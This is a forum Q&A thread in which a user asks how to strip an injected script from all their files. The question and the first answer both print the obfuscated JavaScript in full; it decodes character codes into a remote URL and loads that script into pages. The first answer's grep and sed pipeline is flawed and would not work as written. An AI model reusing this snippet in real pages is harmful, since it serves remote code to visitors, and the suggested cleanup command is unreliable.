# find and replace code snippet in all my files shell

Tags: linux, bash, shell

In ubuntu, I have injected malware into my files with the following code snippet

```
<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>
```

How could I replace or remove this code in all my files from console?

Answer (score 0):

You can use this:

```
grep -irn "your_text" | awk -F ":" '{print $1}' | sed -i 's/your_text//g'
```

You have to replace `your_text` with `<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>`

Answer (score 0):

You should start to use modern tools not command line. Its fun and shows that you have some skills but its also 30 years old.
Use sublime, it has a search and replace in all files functionality